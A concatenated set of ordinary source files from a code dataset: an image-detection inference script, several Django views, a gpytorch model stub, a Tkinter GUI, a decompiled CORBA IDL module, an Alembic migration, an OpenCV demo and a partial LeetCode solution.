counter:\")\n print(str(image_position_counter) + '\\n')\n\n # Running the inference\n split_output_dict = run_inference_for_single_image(image_split, detection_graph)\n \n # Getting rid of edge boxes\n split_output_dict = remove_edge_boxes(\n split_output_dict, \n splits,\n image_position_counter)\n \n # Correcting the relative coordinates\n split_output_dict = fix_relative_coord(\n split_output_dict, \n splits, \n image_position_counter)\n\n # Adding the new data to the output dict\n output_dict['detection_boxes'] = np.concatenate((\n output_dict['detection_boxes'], \n split_output_dict['detection_boxes']))\n output_dict['detection_classes'] = np.concatenate((\n output_dict['detection_classes'], \n split_output_dict['detection_classes']))\n output_dict['detection_scores'] = np.concatenate((\n output_dict['detection_scores'], \n split_output_dict['detection_scores']))\n\n #print(output_dict['detection_boxes'])\n #print(output_dict['detection_classes'])\n #print(output_dict['detection_scores'])\n\n image_position_counter = image_position_counter + 1\n\n # I'll delete any giant boxes here\n output_dict = delete_giant_boxes(output_dict, splits)\n\n # Now the I have the output from the sub-images all combined together, I'll\n # do another round of non-maximum suppression to remove the redundant boxes\n # on the edges. This should also fix the problem where the model predicts\n # fluorescent and nonfluorescent for the same seed. It should keep the one\n # with the higher detection score.\n output_dict = do_non_max_suppression(output_dict)\n\n # Adding in a bit here to count the total number of detections\n seed_counts = get_object_counts(output_dict, args.min_score_threshold)\n\n # Adding the numbers to the output lists\n image_names.append(image_name_string)\n fluorescent_totals.append(seed_counts[0])\n nonfluorescent_totals.append(seed_counts[1])\n\n # Getting detailed info about the boxes and scores for ouput (replace this\n # with ndarrays)\n image_detailed_results = get_boxes_and_scores(output_dict, image_name_string)\n detailed_results[0].extend(image_detailed_results[0])\n detailed_results[1].extend(image_detailed_results[1])\n detailed_results[2].extend(image_detailed_results[2])\n detailed_results[3].extend(image_detailed_results[3])\n detailed_results[4].extend(image_detailed_results[4])\n detailed_results[5].extend(image_detailed_results[5])\n detailed_results[6].extend(image_detailed_results[6])\n\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n category_index,\n use_normalized_coordinates=True,\n line_thickness=2,\n max_boxes_to_draw=10000,\n min_score_thresh=args.min_score_threshold)\n plt.figure(figsize=IMAGE_SIZE)\n plt.imsave(args.output_path + '/' + image_name_string + \"_plot\" + \".jpg\", image_np)\n\n# Printing the summary lists to a file\nwith open(args.output_path + '/' + 'output.tsv', 'w') as output_file:\n writer = csv.writer(output_file, delimiter='\\t')\n writer.writerows(zip(image_names, fluorescent_totals, nonfluorescent_totals))\n\n# Printing the detailed lists to a file\nwith open(args.output_path + '/' + 'detailed_output.tsv', 'w') as output_file:\n writer = csv.writer(output_file, delimiter='\\t')\n writer.writerows(zip(detailed_results[0],\n detailed_results[1],\n detailed_results[2],\n detailed_results[3],\n detailed_results[4],\n detailed_results[5],\n detailed_results[6]))\n\n","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":28738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218881687","text":"from django.shortcuts import render\nfrom account.models import User\nfrom course.models import Course,UserCourse,Category,Review\nfrom django.db.models import Avg\n\n# Get programming language categories\ndef get_language():\n model_category = Category.objects.all()\n return model_category\n\ndef index(request):\n all_course = Course.objects.all().order_by('-created_at')\n for c in all_course:\n course = Course.objects.get(course_id=c.course_id)\n course_rating = Review.objects.filter(course=course).aggregate(Avg('rating'))\n if course_rating['rating__avg'] != None:\n rating = int(course_rating['rating__avg'])\n c.rating = range(rating) \n else:\n c.rating = None\n category = get_language()\n return render(request, 'index.html',locals())\n\ndef teacher(request):\n category = get_language()\n teacher = User.objects.get(email=request.user.email)\n mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n sort = 'newest'\n\n teacher_course_count = Course.objects.filter(teacher=teacher).count()\n teacher_student_count = UserCourse.objects.filter(course__teacher=teacher).count()\n teacher_rating = Review.objects.filter(course__teacher=teacher).aggregate(Avg('rating'))\n \n if teacher_rating['rating__avg'] == None or teacher_rating == 'None':\n teacher_rating = ''\n else:\n teacher_rating = format(teacher_rating['rating__avg'], '.1f')\n\n \n\n try:\n sort = request.GET.get('sort', 'newest')\n if sort == 'newest':\n mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n else:\n mycourse = Course.objects.filter(teacher=teacher).order_by('created_at') \n except Exception as e:\n mycourse = Course.objects.filter(teacher=teacher).order_by('-created_at')\n\n return render(request,'teacher_index.html',locals())\n\n","sub_path":"index/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"355415513","text":"import torch\nimport gpytorch\nimport numpy as np\nfrom itertools import combinations\n\nclass ExactGPModel(gpytorch.models.ExactGP):\n def __init__(self, nVars, order, inputs, likelihood):\n self.nVars = nVars\n self.order = order\n\n self.xTrain = inputs['x_vals']\n self.yTrain = inputs['y_vals'] - np.mean(inputs['y_vals'])\n\n super(ExactGPModel, self).__init__(self.xTrain, self.yTrain, likelihood)\n self.mean_module = gpytorch.means.ConstantMean()\n self.covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())\n\n # ---------------------------------------------------------\n\n\n\ndef GPTrain(inputs):\n\n\n def train(self, inputs):\n # set data\n self.xTrain = inputs['x_vals']\n self.yTrain = inputs['y_vals']\n\n # create matrix with all covariates based on order\n self.xTrain = self.order_effects(self.xTrain, self.order)\n (nSamps, nCoeffs) = self.xTrain.shape\n\n\n\n\n\n \n # append zeros back - note alpha(1,:) is linear intercept\n alpha_pad = np.zeros(nCoeffs)\n alpha_pad[idx_nnzero] = alphaGibbs[:,-1]\n self.alpha = np.append(a0, alpha_pad)\n\n\n # ---------------------------------------------------------\n # ---------------------------------------------------------\n\n def order_effects(self, x_vals, ord_t):\n # order_effects: Function computes data matrix for all coupling\n # orders to be added into linear regression model.\n\n # Find number of variables\n n_samp, n_vars = x_vals.shape\n\n # Generate matrix to store results\n x_allpairs = x_vals\n\n for ord_i in range(2,ord_t+1):\n\n # generate all combinations of indices (without diagonals)\n offdProd = np.array(list(combinations(np.arange(n_vars),ord_i)))\n\n # generate products of input variables\n x_comb = np.zeros((n_samp, offdProd.shape[0], ord_i))\n for j in range(ord_i):\n x_comb[:,:,j] = x_vals[:,offdProd[:,j]]\n x_allpairs = np.append(x_allpairs, np.prod(x_comb,axis=2),axis=1)\n\n return x_allpairs\n\n\n# -- END OF FILE --","sub_path":"src/GP.py","file_name":"GP.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"44660407","text":"from features.ExtractFeatures import extract_features\nfrom tkinter.filedialog import askopenfilename\n\nfrom features.GroupSigns import get_files\nimport tkinter as tk\nfrom tkinter import filedialog\n\n\nclass SelectionWindow:\n out_path = None\n\n def __init__(self, in_path):\n self.in_path = in_path\n root = tk.Tk()\n\n self.in_path_string = tk.StringVar(value=in_path)\n self.out_path_string = tk.StringVar()\n self.recursively = tk.BooleanVar(root, value=False)\n tk.Button(root, text=\"Source Directory\", command=self.get_source_dir).pack(side=tk.TOP)\n tk.Label(None, textvariable=self.in_path_string, fg='black').pack()\n tk.Button(root, text=\"Destination Directory\", command=self.get_destination_dir).pack(side=tk.TOP)\n tk.Label(None, textvariable=self.out_path_string, fg='black').pack()\n\n tk.Checkbutton(root, text=\"Recursively\", variable=self.recursively).pack()\n\n tk.Button(root, text=\"Start\", command=self.get_files).pack(side=tk.TOP)\n root.mainloop()\n\n def get_source_dir(self):\n self.in_path = filedialog.askdirectory(initialdir=self.in_path)\n self.in_path_string.set(self.in_path)\n\n def get_destination_dir(self):\n self.out_path = filedialog.askdirectory(initialdir=self.out_path)\n self.out_path_string.set(self.out_path)\n\n def get_files(self):\n if self.in_path is not None and self.out_path is not None:\n get_files(\n file_name='all',\n in_dir_path=self.in_path,\n out_dir_path=self.out_path,\n recursively=self.recursively.get()\n )\n\n\nif __name__ == '__main__':\n dir_path = '/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/Data/BlindSubCorpus/FORGERY'\n\n SelectionWindow(dir_path)\n\n # extract_features(\n # in_dir_path='/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/Data/BlindSubCorpus',\n # out_dir_path='/media/bartek/120887D50887B5EF/POLITECHNIKA/Magisterka/SUSigP/results',\n # signatory_nr='039',\n # files_urls=['/FORGERY/039_f_9.sig']\n # )\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"129061325","text":"# Exercise 6 - String Lists\r\n# Date: 18/5/20\r\n# Ask the user for a string and print out if this string is a palindrome or not\r\n# A palindrome is a string that reads the same forward and backward\r\n\r\nstring = input('Type a string:')\r\n\r\nif string[:] == string[::-1]:\r\n print('This is a palindrome.')\r\nelse:\r\n print('This is not a palindrome in which the reverse string is %s.' % string[::-1])\r\n","sub_path":"Ex6.py","file_name":"Ex6.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"169085097","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: ./TimeBase_idl.py\n# Compiled at: 2018-07-20 10:03:27\n# Size of source mod 2**32: 4147 bytes\nimport omniORB, _omnipy\nfrom omniORB import CORBA, PortableServer\n_0_CORBA = CORBA\n_omnipy.checkVersion(4, 2, __file__, 1)\ntry:\n property\nexcept NameError:\n\n def property(*args):\n pass\n\n\n__name__ = 'TimeBase'\n_0_TimeBase = omniORB.openModule('TimeBase', '/tmp/corba/omni/share/idl/omniORB/COS/TimeBase.idl')\n_0_TimeBase__POA = omniORB.openModule('TimeBase__POA', '/tmp/corba/omni/share/idl/omniORB/COS/TimeBase.idl')\n\nclass TimeT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/TimeT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.TimeT = TimeT\n_0_TimeBase._d_TimeT = omniORB.tcInternal.tv_ulonglong\n_0_TimeBase._ad_TimeT = (omniORB.tcInternal.tv_alias, TimeT._NP_RepositoryId, 'TimeT', omniORB.tcInternal.tv_ulonglong)\n_0_TimeBase._tc_TimeT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_TimeT)\nomniORB.registerType(TimeT._NP_RepositoryId, _0_TimeBase._ad_TimeT, _0_TimeBase._tc_TimeT)\ndel TimeT\n\nclass InaccuracyT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/InaccuracyT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.InaccuracyT = InaccuracyT\n_0_TimeBase._d_InaccuracyT = omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0']\n_0_TimeBase._ad_InaccuracyT = (omniORB.tcInternal.tv_alias, InaccuracyT._NP_RepositoryId, 'InaccuracyT', omniORB.typeCodeMapping['IDL:omg.org/TimeBase/TimeT:1.0']._d)\n_0_TimeBase._tc_InaccuracyT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_InaccuracyT)\nomniORB.registerType(InaccuracyT._NP_RepositoryId, _0_TimeBase._ad_InaccuracyT, _0_TimeBase._tc_InaccuracyT)\ndel InaccuracyT\n\nclass TdfT:\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/TdfT:1.0'\n\n def __init__(self, *args, **kw):\n raise RuntimeError('Cannot construct objects of this type.')\n\n\n_0_TimeBase.TdfT = TdfT\n_0_TimeBase._d_TdfT = omniORB.tcInternal.tv_short\n_0_TimeBase._ad_TdfT = (omniORB.tcInternal.tv_alias, TdfT._NP_RepositoryId, 'TdfT', omniORB.tcInternal.tv_short)\n_0_TimeBase._tc_TdfT = omniORB.tcInternal.createTypeCode(_0_TimeBase._ad_TdfT)\nomniORB.registerType(TdfT._NP_RepositoryId, _0_TimeBase._ad_TdfT, _0_TimeBase._tc_TdfT)\ndel TdfT\n_0_TimeBase.UtcT = omniORB.newEmptyClass()\n\nclass UtcT(omniORB.StructBase):\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/UtcT:1.0'\n\n def __init__(self, time, inacclo, inacchi, tdf):\n self.time = time\n self.inacclo = inacclo\n self.inacchi = inacchi\n self.tdf = tdf\n\n\n_0_TimeBase.UtcT = UtcT\n_0_TimeBase._d_UtcT = (omniORB.tcInternal.tv_struct, UtcT, UtcT._NP_RepositoryId, 'UtcT', 'time', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'], 'inacclo', omniORB.tcInternal.tv_ulong, 'inacchi', omniORB.tcInternal.tv_ushort, 'tdf', omniORB.typeMapping['IDL:omg.org/TimeBase/TdfT:1.0'])\n_0_TimeBase._tc_UtcT = omniORB.tcInternal.createTypeCode(_0_TimeBase._d_UtcT)\nomniORB.registerType(UtcT._NP_RepositoryId, _0_TimeBase._d_UtcT, _0_TimeBase._tc_UtcT)\ndel UtcT\n_0_TimeBase.IntervalT = omniORB.newEmptyClass()\n\nclass IntervalT(omniORB.StructBase):\n _NP_RepositoryId = 'IDL:omg.org/TimeBase/IntervalT:1.0'\n\n def __init__(self, lower_bound, upper_bound):\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n\n\n_0_TimeBase.IntervalT = IntervalT\n_0_TimeBase._d_IntervalT = (omniORB.tcInternal.tv_struct, IntervalT, IntervalT._NP_RepositoryId, 'IntervalT', 'lower_bound', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'], 'upper_bound', omniORB.typeMapping['IDL:omg.org/TimeBase/TimeT:1.0'])\n_0_TimeBase._tc_IntervalT = omniORB.tcInternal.createTypeCode(_0_TimeBase._d_IntervalT)\nomniORB.registerType(IntervalT._NP_RepositoryId, _0_TimeBase._d_IntervalT, _0_TimeBase._tc_IntervalT)\ndel IntervalT\n__name__ = 'TimeBase_idl'\n_exported_modules = ('TimeBase', )","sub_path":"pycfiles/ans_python-0.3.1-py3-none-any/TimeBase_idl.cpython-36.py","file_name":"TimeBase_idl.cpython-36.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"102871275","text":"import os\nimport yaml\nimport shelve\n\nclass ReachabilityTestAPI:\n \"\"\"Simple reachability test API\"\"\"\n d = []\n dbname = \"reachabilitydb\"\n c = []\n runlistdb = \"runlistdb\"\n run_list = []\n quick_test = \"temporaryvariabletoholdquicktest\"\n\n def __init__(self):\n self.d = []\n self.dbname = \"reachabilitydb\"\n self.runlistdb = \"runlistdb\"\n self.c = []\n self.run_list = []\n self.quick_test = \"temporaryvariabletoholdquicktest\"\n\n \"\"\"Adds a reachability object to the running\n list of test.\n argument: ReachabilityTestStub object\"\"\"\n def addReachabilityTest(self,test):\n d = shelve.open(self.dbname)\n d[test.name] = test\n d.close()\n\n c = shelve.open(self.runlistdb)\n c[test.name] = []\n c.close()\n\n \"\"\"Adds a quick test a.k.a. troubleshoot to a\n temporary location in memory.\n agument: ReachabilityTestStub object\"\"\"\n def addQuickTest(self,test):\n d = shelve.open(self.dbname)\n d[self.quick_test] = test\n d.close()\n\n c = shelve.open(self.runlistdb)\n c[self.quick_test] = []\n c.close()\n\n \"\"\"Gets a sorted list of reachability test objects.\n The function clears any previously ran quick test\n before returning the list.\n argument: none\n return: dictionary\"\"\"\n def listReachabilityTest(self):\n d = shelve.open(self.dbname)\n if(d.has_key(self.quick_test)):\n del d[self.quick_test]\n testlist = d.keys()\n testlist.sort()\n returnlist = []\n for item in testlist:\n returnlist.append(d[item])\n d.close()\n\n c = shelve.open(self.runlistdb)\n if(c.has_key(self.quick_test)):\n del c[self.quick_test]\n c.close()\n\n return returnlist\n\n \"\"\"Gets a list of the previous reachability test runs\n for a particular test. It takes the name of the\n test as key to find the object in the shelve object.\n It returns a dictionary with the previous\n timestamps for that test.\n argument: String\n return: dictionary\"\"\"\n def listTestRuns(self,test_name):\n c = shelve.open(self.runlistdb)\n if(c.has_key(test_name)):\n self.run_list = c[test_name]\n c.close()\n\n run_list = []\n count = 0\n\n for item in self.run_list:\n run_list.append(self.run_list[count].last_run)\n count += 1\n\n if(run_list.__len__() < 1):\n return None\n\n return run_list\n\n \"\"\"Stores a previously created quick test as a\n rechability test. It takes the test name as\n argument to use as key to store into the\n shelve object. It returns the newly added test.\n argument: String\n return: ReachabilityTestStub object\"\"\"\n def saveQuickTest(self,test_name):\n d = shelve.open(self.dbname)\n saved_test = d[self.quick_test]\n saved_test.name = test_name\n d[test_name] = saved_test\n d.close()\n\n c = shelve.open(self.runlistdb)\n saved_run_list = c[self.quick_test]\n c[test_name] = saved_run_list\n c.close()\n\n return saved_test\n \n \"\"\"Delete a reachability test stored in the\n shelve object. It takes the test name as argument.\n argument: String\"\"\"\n def deleteReachabilityTest(self,test):\n d = shelve.open(self.dbname)\n if(d.has_key(test)):\n del d[test]\n d.close()\n\n c = shelve.open(self.runlistdb)\n if(c.has_key(test)):\n del c[test]\n c.close()\n\n \"\"\"Delete the quick test from the shelve object. It\n takes no argument since only one quick test is \n permitted at a time so no need to find it.\"\"\"\n def deleteQuickTest(self):\n d = shelve.open(self.dbname)\n del d[self.quick_test]\n d.close()\n\n c = shelve.open(self.runlistdb)\n if(c.has_key(self.quick_test)):\n del c[self.quick_test]\n c.close()\n\n \"\"\"Simulates the running of the quick test. It updates\n the quick test object with a random pass/fail.\"\"\"\n def runQuickTest(self):\n c = shelve.open(self.runlistdb)\n self.run_list = c[self.quick_test]\n c.close()\n\n d = shelve.open(self.dbname)\n data = d[self.quick_test]\n data.runTest()\n data.runTest()\n if(data.status == \"pass\" or data.status == \"fail\"):\n self.run_list.append(data)\n if(self.run_list.__len__() > 5):\n self.run_list.pop(0)\n d[self.quick_test] = data\n d.close()\n\n c = shelve.open(self.runlistdb)\n c[self.quick_test] = self.run_list\n c.close()\n \n \"\"\"Simulates the running of the reachability test. The \n function updates the object with a pending state if ran\n for the first time and a random pass/fail if ran again.\n It takes the test name as argument to find the object \n in the shelve.\n argument: String\"\"\"\n def runReachabilityTest(self,test):\n c = shelve.open(self.runlistdb)\n self.run_list = c[test]\n c.close()\n\n d = shelve.open(self.dbname)\n data = d[test]\n data.runTest()\n if(data.status == \"pass\" or data.status == \"fail\"):\n self.run_list.append(data)\n if(self.run_list.__len__() > 5):\n self.run_list.pop(0)\n d[test] = data\n d.close()\n\n c = shelve.open(self.runlistdb)\n c[test] = self.run_list\n c.close()\n\n \"\"\"Returns the rechability test stored in the \n shelve. It takes the test name as argument.\n argument: String\n return: ReachabilityTestStub object\"\"\"\n def getReachabilityTest(self,test):\n d = shelve.open(self.dbname)\n data = d[test]\n d.close()\n return data\n \n \"\"\"Returns the quick test stored in the shelve.\n return: RechabilityTestStub object\"\"\"\n def getQuickTest(self):\n d = shelve.open(self.dbname)\n data = d[self.quick_test]\n d.close()\n return data\n \n \"\"\"Updates a current reachabiliyt test stored in\n the shelve. It takes the test name and the \n new reachability test object to replace the\n old one with.\n arguments: String, ReachabilityTestStub object\"\"\"\n def updateReachabilityTest(self, test_id, data):\n d = shelve.open(self.dbname)\n del d[test_id]\n d[data.name] = data\n d.close()\n\n c = shelve.open(self.runlistdb)\n del c[test_id]\n c[data.name] = []\n c.close()\n\n\n\nclass NetworkTemplateAPI:\n \"\"\"Simple Network Template API\"\"\"\n heatdb = \"heatdb\"\n heat_template = \"temporaryvariabletoholdexampleheattemplate\"\n h = []\n heat_template_file_path = \"\"\n\n def __init__(self):\n self.heatdb = \"heatdb\"\n self.h = []\n self.heat_template = \"temporaryvariabletoholdexampleheattemplate\"\n self.heat_template_file_path = os.path.abspath(\n os.path.join(os.path.dirname(__file__),\n \"sample_heat_templates\",\n \"basic_3tier.yaml\")\n )\n\n \"\"\"Reads the sample heat template file and uses the PyYAML\n parser to store the data in a dictionary within the\n shelve.\"\"\"\n def loadHeatTemplate(self):\n f = open(self.heat_template_file_path)\n dataMap = yaml.safe_load(f)\n f.close()\n\n h = shelve.open(self.heatdb)\n h[self.heat_template] = dataMap\n h.close()\n\n \"\"\"Returns the heat template object stored in the\n shelve if it exist. Otherwise it returns an empty\n dictionary.\n return: dictionary\"\"\"\n def getHeatTemplate(self):\n h = shelve.open(self.heatdb)\n if(h.has_key(self.heat_template)):\n template = h[self.heat_template]\n else:\n template = {}\n h.close()\n return template\n\n \"\"\"Deletes the heat template object if it exist in\n the shelve. Otherwise, it does nothing.\"\"\"\n def removeHeatTemplate(self):\n h = shelve.open(self.heatdb)\n if(h.has_key(self.heat_template)):\n del h[self.heat_template]\n h.close()\n \n \"\"\"Updates the heat template with a new dictionary\n pass on as a parameter.\n argument: dictionary\"\"\"\n def updateHeatTemplate(self,updated_template):\n h = shelve.open(self.heatdb)\n h[self.heat_template] = updated_template\n h.close()\n","sub_path":"openstack_dashboard/dashboards/project/connections/mockapi.py","file_name":"mockapi.py","file_ext":"py","file_size_in_byte":8655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11498828","text":"import cv2\nimport numpy as np\n\ncapture = cv2.VideoCapture(0)\nfgbg = cv2.bgsegm.createBackgroundSubtractorMOG()\nflag = 1\nwhile(True):\n ret, frame = capture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n fgmask = fgbg.apply(frame)\n cv2.imshow('frame', fgmask)\n cv2.imshow('ai', frame)\n cv2.imshow('dist', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nprint(type(frame))\nprint(type(fgbg))\ncapture.release()\ncv2.destroyAllWindows()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455264570","text":"from django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom encyclopedia.tamilthedal.models import *\nimport os, string\nimport sys\nimport re\nfrom whoosh.index import open_dir\nfrom whoosh.qparser import QueryParser, MultifieldParser\nfrom whoosh.fields import Schema, STORED, ID, KEYWORD, TEXT\nfrom whoosh.query import *\n\nspecialchars = ['(', ')', '^',':','\"', '{', '}', '[', ']']\n\ndef sanitize(query):\n if query:\n for x in specialchars:\n query = query.replace(x, '')\n query = query.strip()\n return query\n\ndef __getUserDetails__(request):\n if (request.POST.get('username', '') == '' or request.POST.get('password', '') == ''):\n return None\n\n return User(username = request.POST.get('username', ''), password = request.POST.get('password', ''))\n\ndef home(request):\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n\ndef about(request):\n return render_to_response('aboutus.html', {}, context_instance=RequestContext(request))\n\ndef contact(request):\n return render_to_response('contactus.html', {}, context_instance=RequestContext(request))\n\ndef abbreviations(request):\n return render_to_response('abbreviations.html', {}, context_instance=RequestContext(request))\n\ndef login(request):\n #import pdb; pdb.set_trace()\n UserDetails = __getUserDetails__(request)\n if not UserDetails:\n #This is not a POST request. Check whether we are already logged-in\n if request.user and request.user.is_authenticated():\n #User is already logged-in\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n else:\n return render_to_response('login.html', {}, context_instance=RequestContext(request))\n else:\n #User is trying to log-in\n user = auth.authenticate(username = UserDetails.username, password = UserDetails.password)\n if user is not None:\n auth.login(request, user)\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n else:\n return render_to_response('login.html', {'msg': 'Invalid username/password'}, context_instance=RequestContext(request));\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/home/\")\n\n@login_required\ndef editentry(request):\n id = request.GET.get('id', '')\n if id == '':\n return render_to_response('editdata.html', {'mode':'Create'}, context_instance=RequestContext(request));\n else:\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = QueryParser('id', schema=index.schema)\n qry = parser.parse(id)\n results = srch.search(qry)\n if len(results) > 0:\n return render_to_response('editdata.html', {'mode':'Update', 'result':results[0]}, context_instance=RequestContext(request));\n else:\n return render_to_response('editdata.html', {'mode':'Update'}, context_instance=RequestContext(request));\n\n@login_required\ndef saveentry(request):\n id = request.POST.get('id', '')\n key_ta = request.POST.get('key-ta', '')\n key_en = request.POST.get('key-en', '')\n content = request.POST.get('context', '')\n\n if key_ta != '' and content != '':\n if id != '':\n entry = Entry(id, unicode(key_ta), key_en, unicode(content))\n else:\n entry = Entry.objects.create()\n entry.key_ta = unicode(key_ta)\n entry.key_en = key_en\n entry.entry = unicode(content)\n entry.save()\n return render_to_response('index.html', {'msg':'Saved successfully'}, context_instance=RequestContext(request));\n \n\n@login_required\ndef deleteentry(request):\n id = request.GET.get('id', '')\n msg = ''\n if id != '':\n entries = Entry.objects.filter(id=id)\n if entries and len(entries) > 0:\n for entry in entries:\n entry.delete()\n msg = 'Deleted successfully'\n else:\n msg = 'Could not find entry to delete'\n else:\n msg = 'No record passed for delete'\n return render_to_response('index.html', {'msg':msg}, context_instance=RequestContext(request));\n\n\ndef search(request):\n finalresult = []\n query = request.POST.get('transliterate', None)\n if query:\n query = sanitize(query)\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = MultifieldParser(['key_ta', 'key_en', 'content'],\n schema=index.schema)\n qry = parser.parse(query)\n results = srch.search(qry)\n for res in results:\n if res['key_ta'] and res['content']:\n key = res['key_ta']\n if res['key_en']:\n key = key + \" (\" + res['key_en'] + \")\"\n \n finalresult.append({'id':res['id'], 'key':key, 'content':res['content'].encode('utf-8')})\n\n return render_to_response('index.html', {'result': finalresult, 'searchword': query, \\\n 'totalres': len(finalresult)}, context_instance=RequestContext(request))\n\ndef letterSearch(request):\n finalresult = []\n query = request.GET.get('letter', None)\n if query:\n query = sanitize(query)\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = QueryParser('key_ta', schema=index.schema)\n qry = parser.parse(query + u'*')\n results = srch.search(qry, sortedby=\"key_ta\")\n for res in results:\n if res['key_ta'] and res['content'] and res['key_ta'].startswith(query):\n key = res['key_ta']\n if res['key_en']:\n key = key + \" (\" + res['key_en'] + \")\"\n \n finalresult.append({'id':res['id'], 'key':key, 'content':res['content'].encode('utf-8')})\n \n return render_to_response('index.html', {'result': finalresult, 'searchword': query, 'totalres': len(finalresult)},\\\n context_instance=RequestContext(request))\n","sub_path":"Tamilkaaviyathedal1.2.1/tamilthedal/encyclopedia/tamilthedal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471948070","text":"\"\"\"empty message\n\nRevision ID: 16a84fe1ab0d\nRevises: 5490f013b39c\nCreate Date: 2017-09-05 18:22:08.189265\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '16a84fe1ab0d'\ndown_revision = '5490f013b39c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('records', sa.Column(\n 'error', sa.String(length=64), nullable=True))\n op.add_column('records', sa.Column('success', sa.Boolean(), nullable=True))\n # op.drop_column('records', 'result')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n # op.add_column('records', sa.Column('result', sa.BOOLEAN(), nullable=True))\n op.drop_column('records', 'success')\n op.drop_column('records', 'error')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/16a84fe1ab0d_.py","file_name":"16a84fe1ab0d_.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"340092652","text":"\"\"\"\n1190. Reverse Substrings Between Each Pair of Parentheses\n\nYou are given a string s that consists of lower case English letters and brackets. \n\nReverse the strings in each pair of matching parentheses, starting from the innermost one.\n\nYour result should not contain any brackets.\n\n \n\nExample 1:\n\nInput: s = \"(abcd)\"\nOutput: \"dcba\"\nExample 2:\n\nInput: s = \"(u(love)i)\"\nOutput: \"iloveu\"\nExplanation: The substring \"love\" is reversed first, then the whole string is reversed.\nExample 3:\n\nInput: s = \"(ed(et(oc))el)\"\nOutput: \"leetcode\"\nExplanation: First, we reverse the substring \"oc\", then \"etco\", and finally, the whole string.\nExample 4:\n\nInput: s = \"a(bcdefghijkl(mno)p)q\"\nOutput: \"apmnolkjihgfedcbq\"\n \n\nConstraints:\n\n0 <= s.length <= 2000\ns only contains lower case English characters and parentheses.\nIt's guaranteed that all parentheses are balanced.\n\"\"\"\n\n\nclass ReverseParentheses:\n\n \"\"\"\n Solution 1: Brute Force\n Here is the brute force solution, which seems really easy to write.\n Nothing more to talk about.\n\n Time O(N^2), Space O(N)\n \"\"\"\n def doit_(self, s):\n res = ['']\n for c in s:\n if c == '(':\n res.append('')\n elif c == ')':\n res[len(res) - 2] += res.pop()[::-1]\n else:\n res[-1] += c\n return \"\".join(res)\n\n \"\"\"\n Solution 2: Wormholes\n Intuition\n Nice. I got a green accpeted with solution 1.\n Now before move on, let us check the solutions in the discuss.\n\n Hey hey hey wait, ALL 